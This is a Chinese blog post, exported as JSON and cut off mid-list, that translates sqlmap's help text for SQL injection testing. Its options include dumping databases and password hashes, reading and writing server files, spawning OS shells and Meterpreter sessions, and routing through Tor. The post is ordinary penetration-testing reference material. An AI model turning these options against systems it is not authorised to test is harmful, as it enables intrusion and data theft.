{"id":716,"date":"2025-10-24T14:24:22","date_gmt":"2025-10-24T06:24:22","guid":{"rendered":"https:\/\/www.youvii.site\/?p=716"},"modified":"2025-10-24T14:32:22","modified_gmt":"2025-10-24T06:32:22","slug":"sqlmap","status":"publish","type":"post","link":"https:\/\/www.youvii.site\/index.php\/archives\/sqlmap","title":{"rendered":"SQLmap"},"content":{"rendered":"<h1>SQLmap<\/h1>\n<h1>\u5b98\u7f51<\/h1>\n<p><a href=\"https:\/\/sqlmap.org\/\">https:\/\/sqlmap.org\/<\/a><\/p>\n<p>sqlmap\u662f\u4e00\u4e2a\u5f00\u6e90\u7684\u6e17\u900f\u6d4b\u8bd5\u5de5\u5177\uff0c\u5b83\u53ef\u4ee5\u81ea\u52a8\u5316\u68c0\u6d4b\u548c\u5229\u7528SQL\u6ce8\u5165\u6f0f\u6d1e\u5e76\u63a5\u7ba1\u6570\u636e\u5e93\u670d\u52a1\u5668\u3002\u5b83\u6709\u4e00\u4e2a\u5f3a\u5927\u7684\u68c0\u6d4b\u5f15\u64ce\uff0c\u8bb8\u591a\u9002\u5408\u4e8e\u7ec8\u6781\u6e17\u900f\u6d4b\u8bd5\u7684\u826f\u597d\u7279\u6027\u548c\u4f17\u591a\u7684\u64cd\u4f5c\u9009\u9879\uff0c\u4ece\u6570\u636e\u5e93\u6307\u7eb9\u3001\u6570\u636e\u83b7\u53d6\u5230\u8bbf\u95ee\u5e95\u5c42\u6587\u4ef6\u7cfb\u7edf\u3001\u6267\u884c\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4\u3002<\/p>\n<p>kali \u81ea\u5e26 sqlmap<\/p>\n<p>\u66f4\u65b0sqlmap<\/p>\n<p><code>python sqlmap.py --update<\/code><\/p>\n<p>\u663e\u793a\u7ec8\u7aef\u5e2e\u52a9\u6587\u6863<\/p>\n<p><code>sqlmap -h<\/code><\/p>\n<p>\u663e\u793asqlmap\u8be6\u7ec6\u7684\u5e2e\u52a9\u6587\u6863<\/p>\n<p><code>sqlmap -hh<\/code><\/p>\n<p>\u4e2d\u6587\u5e2e\u52a9\u6587\u6863<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-markdown\">\u7528\u6cd5\uff1apython sqlmap.py [\u9009\u9879]\n\u9009\u9879\uff1a\n-h, --help \u663e\u793a\u57fa\u672c\u5e2e\u52a9\u4fe1\u606f\u5e76\u9000\u51fa\n-hh \u663e\u793a\u9ad8\u7ea7\u5e2e\u52a9\u4fe1\u606f\u5e76\u9000\u51fa\n--version \u663e\u793a\u7a0b\u5e8f\u7248\u672c\u4fe1\u606f\u5e76\u9000\u51fa\n-v VERBOSE 
\u8f93\u51fa\u4fe1\u606f\u8be6\u7ec6\u7a0b\u5ea6\u7ea7\u522b\uff1a0-6\uff08\u9ed8\u8ba4\u4e3a 1\uff09\n\u76ee\u6807\uff1a\n\u81f3\u5c11\u63d0\u4f9b\u4e00\u4e2a\u4ee5\u4e0b\u9009\u9879\u4ee5\u6307\u5b9a\u76ee\u6807\n-d DIRECT \u76f4\u63a5\u8fde\u63a5\u6570\u636e\u5e93\n-u URL, --url=URL \u76ee\u6807 URL\uff08\u4f8b\u5982\uff1a\"http:\/\/www.site.com\/vuln.php?id=1\"\uff09\n-l LOGFILE \u4ece Burp \u6216 WebScarab \u4ee3\u7406\u7684\u65e5\u5fd7\u6587\u4ef6\u4e2d\u89e3\u6790\u76ee\u6807\u5730\u5740\n-x SITEMAPURL \u4ece\u8fdc\u7a0b\u7f51\u7ad9\u5730\u56fe\uff08.xml\uff09\u6587\u4ef6\u4e2d\u89e3\u6790\u76ee\u6807\n-m BULKFILE \u4ece\u6587\u672c\u6587\u4ef6\u4e2d\u83b7\u53d6\u6279\u91cf\u76ee\u6807\n-r REQUESTFILE \u4ece\u6587\u4ef6\u4e2d\u8bfb\u53d6 HTTP \u8bf7\u6c42\n-g GOOGLEDORK \u4f7f\u7528 Google dork \u7ed3\u679c\u4f5c\u4e3a\u76ee\u6807\n-c CONFIGFILE \u4ece INI \u914d\u7f6e\u6587\u4ef6\u4e2d\u52a0\u8f7d\u9009\u9879\n\u8bf7\u6c42\uff1a\n\u4ee5\u4e0b\u9009\u9879\u53ef\u4ee5\u6307\u5b9a\u8fde\u63a5\u76ee\u6807\u5730\u5740\u7684\u65b9\u5f0f\n  --method=METHOD \u5f3a\u5236\u4f7f\u7528\u63d0\u4f9b\u7684 HTTP \u65b9\u6cd5\uff08\u4f8b\u5982\uff1aPUT\uff09\n--data=DATA \u4f7f\u7528 POST \u53d1\u9001\u6570\u636e\u4e32\n--param-del=PARA.. \u8bbe\u7f6e\u53c2\u6570\u503c\u5206\u9694\u7b26\n--cookie=COOKIE \u6307\u5b9a HTTP Cookie\n--cookie-del=COO.. \u8bbe\u7f6e cookie \u5206\u9694\u7b26\n--load-cookies=L.. \u6307\u5b9a\u4ee5 Netscape\/wget \u683c\u5f0f\u5b58\u653e cookies \u7684\u6587\u4ef6\n--drop-set-cookie \u5ffd\u7565 HTTP \u54cd\u5e94\u4e2d\u7684 Set-Cookie \u53c2\u6570\n--user-agent=AGENT \u6307\u5b9a HTTP User-Agent\n--random-agent \u4f7f\u7528\u968f\u673a\u7684 HTTP User-Agent\n--host=HOST \u6307\u5b9a HTTP Host\n--referer=REFERER \u6307\u5b9a HTTP Referer\n-H HEADER, --hea.. 
\u8bbe\u7f6e\u989d\u5916\u7684 HTTP \u5934\u53c2\u6570\uff08\u4f8b\u5982\uff1a\"X-Forwarded-For: 127.0.0.1\"\uff09\n--headers=HEADERS \u8bbe\u7f6e\u989d\u5916\u7684 HTTP \u5934\u53c2\u6570\uff08\u4f8b\u5982\uff1a\"Accept-Language: frnETag: 123\"\uff09\n--auth-type=AUTH.. HTTP \u8ba4\u8bc1\u65b9\u5f0f\uff08Basic\uff0cDigest\uff0cNTLM \u6216 PKI\uff09\n--auth-cred=AUTH.. HTTP \u8ba4\u8bc1\u51ed\u8bc1\uff08username:password\uff09\n--auth-file=AUTH.. HTTP \u8ba4\u8bc1 PEM \u8bc1\u4e66\/\u79c1\u94a5\u6587\u4ef6\n--ignore-code=IG.. \u5ffd\u7565 HTTP \u9519\u8bef\u7801\uff08\u4f8b\u5982\uff1a401\uff09\n--ignore-proxy \u5ffd\u7565\u7cfb\u7edf\u9ed8\u8ba4\u4ee3\u7406\u8bbe\u7f6e\n--ignore-redirects \u5ffd\u7565\u91cd\u5b9a\u5411\u5c1d\u8bd5\n--ignore-timeouts \u5ffd\u7565\u8fde\u63a5\u8d85\u65f6\n--proxy=PROXY \u4f7f\u7528\u4ee3\u7406\u8fde\u63a5\u76ee\u6807 URL\n--proxy-cred=PRO.. \u4f7f\u7528\u4ee3\u7406\u8fdb\u884c\u8ba4\u8bc1\uff08username:password\uff09\n--proxy-file=PRO.. \u4ece\u6587\u4ef6\u4e2d\u52a0\u8f7d\u4ee3\u7406\u5217\u8868\n--tor \u4f7f\u7528 Tor \u533f\u540d\u7f51\u7edc\n--tor-port=TORPORT \u8bbe\u7f6e Tor \u4ee3\u7406\u7aef\u53e3\u4ee3\u66ff\u9ed8\u8ba4\u7aef\u53e3\n--tor-type=TORTYPE \u8bbe\u7f6e Tor \u4ee3\u7406\u65b9\u5f0f\uff08HTTP\uff0cSOCKS4 \u6216 SOCKS5\uff08\u9ed8\u8ba4\uff09\uff09\n--check-tor \u68c0\u67e5\u662f\u5426\u6b63\u786e\u4f7f\u7528\u4e86 Tor\n--delay=DELAY \u8bbe\u7f6e\u6bcf\u4e2a HTTP \u8bf7\u6c42\u7684\u5ef6\u8fdf\u79d2\u6570\n--timeout=TIMEOUT \u8bbe\u7f6e\u8fde\u63a5\u54cd\u5e94\u7684\u6709\u6548\u79d2\u6570\uff08\u9ed8\u8ba4\u4e3a 30\uff09\n--retries=RETRIES \u8fde\u63a5\u8d85\u65f6\u65f6\u91cd\u8bd5\u6b21\u6570\uff08\u9ed8\u8ba4\u4e3a 3\uff09\n--randomize=RPARAM \u968f\u673a\u66f4\u6539\u7ed9\u5b9a\u7684\u53c2\u6570\u503c\n--safe-url=SAFEURL \u6d4b\u8bd5\u8fc7\u7a0b\u4e2d\u53ef\u9891\u7e41\u8bbf\u95ee\u4e14\u5408\u6cd5\u7684 URL 
\u5730\u5740\uff08\u8bd1\u8005\u6ce8\uff1a\n\u6709\u4e9b\u7f51\u7ad9\u5728\u4f60\u8fde\u7eed\u591a\u6b21\u8bbf\u95ee\u9519\u8bef\u5730\u5740\u65f6\u4f1a\u5173\u95ed\u4f1a\u8bdd\u8fde\u63a5\uff0c\n\u540e\u9762\u7684\u201c\u8bf7\u6c42\u201d\u5c0f\u8282\u6709\u8be6\u7ec6\u8bf4\u660e\uff09\n--safe-post=SAFE.. \u4f7f\u7528 POST \u65b9\u6cd5\u53d1\u9001\u5408\u6cd5\u7684\u6570\u636e\n--safe-req=SAFER.. \u4ece\u6587\u4ef6\u4e2d\u52a0\u8f7d\u5408\u6cd5\u7684 HTTP \u8bf7\u6c42\n--safe-freq=SAFE.. \u6bcf\u8bbf\u95ee\u4e24\u6b21\u7ed9\u5b9a\u7684\u5408\u6cd5 URL \u624d\u53d1\u9001\u4e00\u6b21\u6d4b\u8bd5\u8bf7\u6c42\n--skip-urlencode \u4e0d\u5bf9 payload \u6570\u636e\u8fdb\u884c URL \u7f16\u7801\n--csrf-token=CSR.. \u8bbe\u7f6e\u7f51\u7ad9\u7528\u6765\u53cd CSRF \u653b\u51fb\u7684 token\n--csrf-url=CSRFURL \u6307\u5b9a\u53ef\u63d0\u53d6\u53cd CSRF \u653b\u51fb token \u7684 URL\n--force-ssl \u5f3a\u5236\u4f7f\u7528 SSL\/HTTPS\n--hpp \u4f7f\u7528 HTTP \u53c2\u6570\u6c61\u67d3\u653b\u51fb\n--eval=EVALCODE \u5728\u53d1\u8d77\u8bf7\u6c42\u524d\u6267\u884c\u7ed9\u5b9a\u7684 Python \u4ee3\u7801\uff08\u4f8b\u5982\uff1a\n\"import hashlib;id2=hashlib.md5(id).hexdigest()\"\uff09\n\u4f18\u5316\uff1a\n\u4ee5\u4e0b\u9009\u9879\u7528\u4e8e\u4f18\u5316 sqlmap \u6027\u80fd\n-o \u5f00\u542f\u6240\u6709\u4f18\u5316\u5f00\u5173\n--predict-output \u9884\u6d4b\u5e38\u7528\u8bf7\u6c42\u7684\u8f93\u51fa\n--keep-alive \u4f7f\u7528\u6301\u4e45\u7684 HTTP(S) \u8fde\u63a5\n--null-connection \u4ec5\u83b7\u53d6\u9875\u9762\u5927\u5c0f\u800c\u975e\u5b9e\u9645\u7684 HTTP \u54cd\u5e94\n--threads=THREADS \u8bbe\u7f6e HTTP(S) \u8bf7\u6c42\u5e76\u53d1\u6570\u6700\u5927\u503c\uff08\u9ed8\u8ba4\u4e3a 1\uff09\n\u6ce8\u5165\uff1a\n\u4ee5\u4e0b\u9009\u9879\u7528\u4e8e\u6307\u5b9a\u8981\u6d4b\u8bd5\u7684\u53c2\u6570\uff0c\n\u63d0\u4f9b\u81ea\u5b9a\u4e49\u6ce8\u5165 payloads \u548c\u7be1\u6539\u53c2\u6570\u7684\u811a\u672c\n-p TESTPARAMETER \u6307\u5b9a\u9700\u8981\u6d4b\u8bd5\u7684\u53c2\u6570\n--skip=SKIP 
\u6307\u5b9a\u8981\u8df3\u8fc7\u7684\u53c2\u6570\n--skip-static \u6307\u5b9a\u8df3\u8fc7\u975e\u52a8\u6001\u53c2\u6570\n--param-exclude=.. \u7528\u6b63\u5219\u8868\u8fbe\u5f0f\u6392\u9664\u53c2\u6570\uff08\u4f8b\u5982\uff1a\"ses\"\uff09\n--dbms=DBMS \u6307\u5b9a DBMS \u7c7b\u578b\uff08\u4f8b\u5982\uff1aMySQL\uff09\n--dbms-cred=DBMS.. DBMS \u8ba4\u8bc1\u51ed\u636e\uff08username:password\uff09\n--os=OS \u6307\u5b9a DBMS \u670d\u52a1\u5668\u7684\u64cd\u4f5c\u7cfb\u7edf\u7c7b\u578b\n--invalid-bignum \u5c06\u65e0\u6548\u503c\u8bbe\u7f6e\u4e3a\u5927\u6570\n--invalid-logical \u5bf9\u65e0\u6548\u503c\u4f7f\u7528\u903b\u8f91\u8fd0\u7b97\n--invalid-string \u5bf9\u65e0\u6548\u503c\u4f7f\u7528\u968f\u673a\u5b57\u7b26\u4e32\n--no-cast \u5173\u95ed payload \u6784\u9020\u673a\u5236\n--no-escape \u5173\u95ed\u5b57\u7b26\u4e32\u8f6c\u4e49\u673a\u5236\n--prefix=PREFIX \u6ce8\u5165 payload \u7684\u524d\u7f00\u5b57\u7b26\u4e32\n--suffix=SUFFIX \u6ce8\u5165 payload \u7684\u540e\u7f00\u5b57\u7b26\u4e32\n--tamper=TAMPER \u7528\u7ed9\u5b9a\u811a\u672c\u4fee\u6539\u6ce8\u5165\u6570\u636e\n\u68c0\u6d4b\uff1a\n\u4ee5\u4e0b\u9009\u9879\u7528\u4e8e\u81ea\u5b9a\u4e49\u68c0\u6d4b\u65b9\u5f0f\n--level=LEVEL \u8bbe\u7f6e\u6d4b\u8bd5\u7b49\u7ea7\uff081-5\uff0c\u9ed8\u8ba4\u4e3a 1\uff09\n--risk=RISK \u8bbe\u7f6e\u6d4b\u8bd5\u98ce\u9669\u7b49\u7ea7\uff081-3\uff0c\u9ed8\u8ba4\u4e3a 1\uff09\n--string=STRING \u7528\u4e8e\u786e\u5b9a\u67e5\u8be2\u7ed3\u679c\u4e3a\u771f\u65f6\u7684\u5b57\u7b26\u4e32\n--not-string=NOT.. 
\u7528\u4e8e\u786e\u5b9a\u67e5\u8be2\u7ed3\u679c\u4e3a\u5047\u65f6\u7684\u5b57\u7b26\u4e32\n--regexp=REGEXP \u7528\u4e8e\u786e\u5b9a\u67e5\u8be2\u7ed3\u679c\u4e3a\u771f\u65f6\u7684\u6b63\u5219\u8868\u8fbe\u5f0f\n--code=CODE \u7528\u4e8e\u786e\u5b9a\u67e5\u8be2\u7ed3\u679c\u4e3a\u771f\u65f6\u7684 HTTP \u72b6\u6001\u7801\n--text-only \u53ea\u6839\u636e\u9875\u9762\u6587\u672c\u5185\u5bb9\u5bf9\u6bd4\u9875\u9762\n--titles \u53ea\u6839\u636e\u9875\u9762\u6807\u9898\u5bf9\u6bd4\u9875\u9762\n\u6280\u672f\uff1a\n\u4ee5\u4e0b\u9009\u9879\u7528\u4e8e\u8c03\u6574\u7279\u5b9a SQL \u6ce8\u5165\u6280\u672f\u7684\u6d4b\u8bd5\u65b9\u6cd5\n--technique=TECH \u4f7f\u7528\u7684 SQL \u6ce8\u5165\u6280\u672f\uff08\u9ed8\u8ba4\u4e3a\u201cBEUSTQ\u201d\uff0c\u8bd1\u8005\u6ce8\uff1a\nB: Boolean-based blind SQL injection\uff08\u5e03\u5c14\u578b\u76f2\u6ce8\uff09\nE: Error-based SQL injection\uff08\u62a5\u9519\u578b\u6ce8\u5165\uff09\nU: UNION query SQL injection\uff08\u8054\u5408\u67e5\u8be2\u6ce8\u5165\uff09\nS: Stacked queries SQL injection\uff08\u5806\u67e5\u8be2\u6ce8\u5165\uff09\nT: Time-based blind SQL injection\uff08\u65f6\u95f4\u578b\u76f2\u6ce8\uff09\nQ: inline Query injection\uff08\u5185\u8054\u67e5\u8be2\u6ce8\u5165\uff09\n--time-sec=TIMESEC \u5ef6\u8fdf DBMS \u7684\u54cd\u5e94\u79d2\u6570\uff08\u9ed8\u8ba4\u4e3a 5\uff09\n--union-cols=UCOLS \u8bbe\u7f6e\u8054\u5408\u67e5\u8be2\u6ce8\u5165\u6d4b\u8bd5\u7684\u5217\u6570\u76ee\u8303\u56f4\n--union-char=UCHAR \u7528\u4e8e\u66b4\u529b\u731c\u89e3\u5217\u6570\u7684\u5b57\u7b26\n--union-from=UFROM \u8bbe\u7f6e\u8054\u5408\u67e5\u8be2\u6ce8\u5165 FROM \u5904\u7528\u5230\u7684\u8868\n--dns-domain=DNS.. 
\u8bbe\u7f6e\u7528\u4e8e DNS \u6e17\u51fa\u653b\u51fb\u7684\u57df\u540d\uff08\u8bd1\u8005\u6ce8\uff1a\n\u63a8\u8350\u9605\u8bfb\u300a\u5728SQL\u6ce8\u5165\u4e2d\u4f7f\u7528DNS\u83b7\u53d6\u6570\u636e\u300b\nhttp:\/\/cb.drops.wiki\/drops\/tips-5283.html\uff0c\n\u5728\u540e\u9762\u7684\u201c\u6280\u672f\u201d\u5c0f\u8282\u4e2d\u4e5f\u6709\u76f8\u5e94\u89e3\u91ca\uff09\n--second-order=S.. \u8bbe\u7f6e\u4e8c\u9636\u54cd\u5e94\u7684\u7ed3\u679c\u663e\u793a\u9875\u9762\u7684 URL\uff08\u8bd1\u8005\u6ce8\uff1a\n\u8be5\u9009\u9879\u7528\u4e8e\u4e8c\u9636 SQL \u6ce8\u5165\uff09\n\u6307\u7eb9\u8bc6\u522b\uff1a\n-f, --fingerprint \u6267\u884c\u5e7f\u6cdb\u7684 DBMS \u7248\u672c\u6307\u7eb9\u8bc6\u522b\n\u679a\u4e3e\uff1a\n\u4ee5\u4e0b\u9009\u9879\u7528\u4e8e\u83b7\u53d6\u540e\u7aef\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u7684\u4fe1\u606f\uff0c\u7ed3\u6784\u548c\u6570\u636e\u8868\u4e2d\u7684\u6570\u636e\u3002\n\u6b64\u5916\uff0c\u8fd8\u53ef\u4ee5\u8fd0\u884c\u4f60\u8f93\u5165\u7684 SQL \u8bed\u53e5\n-a, --all \u83b7\u53d6\u6240\u6709\u4fe1\u606f\u3001\u6570\u636e\n-b, --banner \u83b7\u53d6 DBMS banner\n--current-user \u83b7\u53d6 DBMS \u5f53\u524d\u7528\u6237\n--current-db \u83b7\u53d6 DBMS \u5f53\u524d\u6570\u636e\u5e93\n--hostname \u83b7\u53d6 DBMS \u670d\u52a1\u5668\u7684\u4e3b\u673a\u540d\n--is-dba \u63a2\u6d4b DBMS \u5f53\u524d\u7528\u6237\u662f\u5426\u4e3a DBA\uff08\u6570\u636e\u5e93\u7ba1\u7406\u5458\uff09\n--users \u679a\u4e3e\u51fa DBMS \u6240\u6709\u7528\u6237\n--passwords \u679a\u4e3e\u51fa DBMS \u6240\u6709\u7528\u6237\u7684\u5bc6\u7801\u54c8\u5e0c\n--privileges \u679a\u4e3e\u51fa DBMS \u6240\u6709\u7528\u6237\u7279\u6743\u7ea7\n--roles \u679a\u4e3e\u51fa DBMS \u6240\u6709\u7528\u6237\u89d2\u8272\n--dbs \u679a\u4e3e\u51fa DBMS \u6240\u6709\u6570\u636e\u5e93\n--tables \u679a\u4e3e\u51fa DBMS \u6570\u636e\u5e93\u4e2d\u7684\u6240\u6709\u8868\n--columns \u679a\u4e3e\u51fa DBMS \u8868\u4e2d\u7684\u6240\u6709\u5217\n--schema \u679a\u4e3e\u51fa DBMS 
\u6240\u6709\u6a21\u5f0f\n--count \u83b7\u53d6\u6570\u636e\u8868\u6570\u76ee\n--dump \u5bfc\u51fa DBMS \u6570\u636e\u5e93\u8868\u9879\n--dump-all \u5bfc\u51fa\u6240\u6709 DBMS \u6570\u636e\u5e93\u8868\u9879\n--search \u641c\u7d22\u5217\uff0c\u8868\u548c\/\u6216\u6570\u636e\u5e93\u540d\n--comments \u83b7\u53d6 DBMS \u6ce8\u91ca\n-D DB \u6307\u5b9a\u8981\u679a\u4e3e\u7684 DBMS \u6570\u636e\u5e93\n-T TBL \u6307\u5b9a\u8981\u679a\u4e3e\u7684 DBMS \u6570\u636e\u8868\n-C COL \u6307\u5b9a\u8981\u679a\u4e3e\u7684 DBMS \u6570\u636e\u5217\n-X EXCLUDECOL \u6307\u5b9a\u8981\u6392\u9664\u7684 DBMS \u6570\u636e\u5217\n-U USER \u6307\u5b9a\u679a\u4e3e\u7684 DBMS \u7528\u6237\n--exclude-sysdbs \u679a\u4e3e\u6240\u6709\u6570\u636e\u8868\u65f6\uff0c\u6307\u5b9a\u6392\u9664\u7279\u5b9a\u7cfb\u7edf\u6570\u636e\u5e93\n--pivot-column=P.. \u6307\u5b9a\u4e3b\u5217\n--where=DUMPWHERE \u5728\u8f6c\u50a8\u8868\u65f6\u4f7f\u7528 WHERE \u6761\u4ef6\u8bed\u53e5\n--start=LIMITSTART \u6307\u5b9a\u8981\u5bfc\u51fa\u7684\u6570\u636e\u8868\u6761\u76ee\u5f00\u59cb\u884c\u6570\n--stop=LIMITSTOP \u6307\u5b9a\u8981\u5bfc\u51fa\u7684\u6570\u636e\u8868\u6761\u76ee\u7ed3\u675f\u884c\u6570\n--first=FIRSTCHAR \u6307\u5b9a\u83b7\u53d6\u8fd4\u56de\u67e5\u8be2\u7ed3\u679c\u7684\u5f00\u59cb\u5b57\u7b26\u4f4d\n--last=LASTCHAR \u6307\u5b9a\u83b7\u53d6\u8fd4\u56de\u67e5\u8be2\u7ed3\u679c\u7684\u7ed3\u675f\u5b57\u7b26\u4f4d\n--sql-query=QUERY \u6307\u5b9a\u8981\u6267\u884c\u7684 SQL \u8bed\u53e5\n--sql-shell \u8c03\u51fa\u4ea4\u4e92\u5f0f SQL shell\n--sql-file=SQLFILE \u6267\u884c\u6587\u4ef6\u4e2d\u7684 SQL \u8bed\u53e5\n\u66b4\u529b\u7834\u89e3\uff1a\n\u4ee5\u4e0b\u9009\u9879\u7528\u4e8e\u66b4\u529b\u7834\u89e3\u6d4b\u8bd5\n--common-tables \u68c0\u6d4b\u5e38\u89c1\u7684\u8868\u540d\u662f\u5426\u5b58\u5728\n--common-columns 
\u68c0\u6d4b\u5e38\u7528\u7684\u5217\u540d\u662f\u5426\u5b58\u5728\n\u7528\u6237\u81ea\u5b9a\u4e49\u51fd\u6570\u6ce8\u5165\uff1a\n\u4ee5\u4e0b\u9009\u9879\u7528\u4e8e\u521b\u5efa\u7528\u6237\u81ea\u5b9a\u4e49\u51fd\u6570\n--udf-inject \u6ce8\u5165\u7528\u6237\u81ea\u5b9a\u4e49\u51fd\u6570\n--shared-lib=SHLIB \u5171\u4eab\u5e93\u7684\u672c\u5730\u8def\u5f84\n\u8bbf\u95ee\u6587\u4ef6\u7cfb\u7edf\uff1a\n\u4ee5\u4e0b\u9009\u9879\u7528\u4e8e\u8bbf\u95ee\u540e\u7aef\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u7684\u5e95\u5c42\u6587\u4ef6\u7cfb\u7edf\n--file-read=RFILE \u8bfb\u53d6\u540e\u7aef DBMS \u6587\u4ef6\u7cfb\u7edf\u4e2d\u7684\u6587\u4ef6\n--file-write=WFILE \u5199\u5165\u540e\u7aef DBMS \u6587\u4ef6\u7cfb\u7edf\u4e2d\u7684\u6587\u4ef6\n--file-dest=DFILE \u4f7f\u7528\u6587\u4ef6\u7edd\u5bf9\u8def\u5f84\u5199\u5165\u5230\u540e\u7aef DBMS\n\u8bbf\u95ee\u64cd\u4f5c\u7cfb\u7edf\uff1a\n\u4ee5\u4e0b\u9009\u9879\u7528\u4e8e\u8bbf\u95ee\u540e\u7aef\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u7684\u5e95\u5c42\u64cd\u4f5c\u7cfb\u7edf\n--os-cmd=OSCMD \u6267\u884c\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4\n--os-shell \u8c03\u51fa\u4ea4\u4e92\u5f0f\u64cd\u4f5c\u7cfb\u7edf shell\n--os-pwn \u8c03\u51fa OOB shell\uff0cMeterpreter \u6216 VNC\n--os-smbrelay \u4e00\u952e\u8c03\u51fa OOB shell\uff0cMeterpreter \u6216 VNC\n--os-bof \u5229\u7528\u5b58\u50a8\u8fc7\u7a0b\u7684\u7f13\u51b2\u533a\u6ea2\u51fa\n--priv-esc \u6570\u636e\u5e93\u8fdb\u7a0b\u7528\u6237\u63d0\u6743\n--msf-path=MSFPATH Metasploit \u6846\u67b6\u7684\u672c\u5730\u5b89\u88c5\u8def\u5f84\n--tmp-path=TMPPATH \u8fdc\u7a0b\u4e34\u65f6\u6587\u4ef6\u76ee\u5f55\u7684\u7edd\u5bf9\u8def\u5f84\n\u8bbf\u95ee Windows \u6ce8\u518c\u8868\uff1a\n\u4ee5\u4e0b\u9009\u9879\u7528\u4e8e\u8bbf\u95ee\u540e\u7aef\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u7684 Windows \u6ce8\u518c\u8868\n--reg-read \u8bfb\u53d6\u4e00\u4e2a Windows \u6ce8\u518c\u8868\u952e\u503c\n--reg-add \u5199\u5165\u4e00\u4e2a Windows 
\u6ce8\u518c\u8868\u952e\u503c\u6570\u636e\n--reg-del \u5220\u9664\u4e00\u4e2a Windows \u6ce8\u518c\u8868\u952e\u503c\n--reg-key=REGKEY \u6307\u5b9a Windows \u6ce8\u518c\u8868\u952e\n--reg-value=REGVAL \u6307\u5b9a Windows \u6ce8\u518c\u8868\u952e\u503c\n--reg-data=REGDATA \u6307\u5b9a Windows \u6ce8\u518c\u8868\u952e\u503c\u6570\u636e\n--reg-type=REGTYPE \u6307\u5b9a Windows \u6ce8\u518c\u8868\u952e\u503c\u7c7b\u578b\n\u901a\u7528\u9009\u9879\uff1a\n\u4ee5\u4e0b\u9009\u9879\u7528\u4e8e\u8bbe\u7f6e\u901a\u7528\u7684\u53c2\u6570\n-s SESSIONFILE \u4ece\u6587\u4ef6\uff08.sqlite\uff09\u4e2d\u8bfb\u5165\u4f1a\u8bdd\u4fe1\u606f\n-t TRAFFICFILE \u4fdd\u5b58\u6240\u6709 HTTP \u6d41\u91cf\u8bb0\u5f55\u5230\u6307\u5b9a\u6587\u672c\u6587\u4ef6\n--batch \u4ece\u4e0d\u8be2\u95ee\u7528\u6237\u8f93\u5165\uff0c\u4f7f\u7528\u9ed8\u8ba4\u914d\u7f6e\n--binary-fields=.. \u5177\u6709\u4e8c\u8fdb\u5236\u503c\u7684\u7ed3\u679c\u5b57\u6bb5\uff08\u4f8b\u5982\uff1a\"digest\"\uff09\n--check-internet \u5728\u8bbf\u95ee\u76ee\u6807\u4e4b\u524d\u68c0\u67e5\u662f\u5426\u6b63\u5e38\u8fde\u63a5\u4e92\u8054\u7f51\n--crawl=CRAWLDEPTH \u4ece\u76ee\u6807 URL \u5f00\u59cb\u722c\u53d6\u7f51\u7ad9\n--crawl-exclude=.. \u7528\u6b63\u5219\u8868\u8fbe\u5f0f\u7b5b\u9009\u722c\u53d6\u7684\u9875\u9762\uff08\u4f8b\u5982\uff1a\"logout\"\uff09\n--csv-del=CSVDEL \u6307\u5b9a\u8f93\u51fa\u5230 CVS \u6587\u4ef6\u65f6\u4f7f\u7528\u7684\u5206\u9694\u7b26\uff08\u9ed8\u8ba4\u4e3a\u201c,\u201d\uff09\n--charset=CHARSET \u6307\u5b9a SQL \u76f2\u6ce8\u5b57\u7b26\u96c6\uff08\u4f8b\u5982\uff1a\"0123456789abcdef\"\uff09\n--dump-format=DU.. \u5bfc\u51fa\u6570\u636e\u7684\u683c\u5f0f\uff08CSV\uff08\u9ed8\u8ba4\uff09\uff0cHTML \u6216 SQLITE\uff09\n--encoding=ENCOD.. 
\u6307\u5b9a\u83b7\u53d6\u6570\u636e\u65f6\u4f7f\u7528\u7684\u5b57\u7b26\u7f16\u7801\uff08\u4f8b\u5982\uff1aGBK\uff09\n--eta \u663e\u793a\u6bcf\u4e2a\u7ed3\u679c\u8f93\u51fa\u7684\u9884\u8ba1\u5230\u8fbe\u65f6\u95f4\n--flush-session \u6e05\u7a7a\u5f53\u524d\u76ee\u6807\u7684\u4f1a\u8bdd\u6587\u4ef6\n--forms \u89e3\u6790\u5e76\u6d4b\u8bd5\u76ee\u6807 URL \u7684\u8868\u5355\n--fresh-queries \u5ffd\u7565\u5b58\u50a8\u5728\u4f1a\u8bdd\u6587\u4ef6\u4e2d\u7684\u67e5\u8be2\u7ed3\u679c\n--har=HARFILE \u5c06\u6240\u6709 HTTP \u6d41\u91cf\u8bb0\u5f55\u5230\u4e00\u4e2a HAR \u6587\u4ef6\u4e2d\n--hex \u83b7\u53d6\u6570\u636e\u65f6\u8c03\u7528 DBMS \u7684 hex \u51fd\u6570\n--output-dir=OUT.. \u81ea\u5b9a\u4e49\u8f93\u51fa\u76ee\u5f55\u8def\u5f84\n--parse-errors \u4ece\u54cd\u5e94\u4e2d\u89e3\u6790\u5e76\u663e\u793a DBMS \u9519\u8bef\u4fe1\u606f\n--save=SAVECONFIG \u5c06\u9009\u9879\u8bbe\u7f6e\u4fdd\u5b58\u5230\u4e00\u4e2a INI \u914d\u7f6e\u6587\u4ef6\n--scope=SCOPE \u7528\u6b63\u5219\u8868\u8fbe\u5f0f\u4ece\u63d0\u4f9b\u7684\u4ee3\u7406\u65e5\u5fd7\u4e2d\u8fc7\u6ee4\u76ee\u6807\n--test-filter=TE.. \u6839\u636e payloads \u548c\/\u6216\u6807\u9898\uff08\u4f8b\u5982\uff1aROW\uff09\u9009\u62e9\u6d4b\u8bd5\n--test-skip=TEST.. 
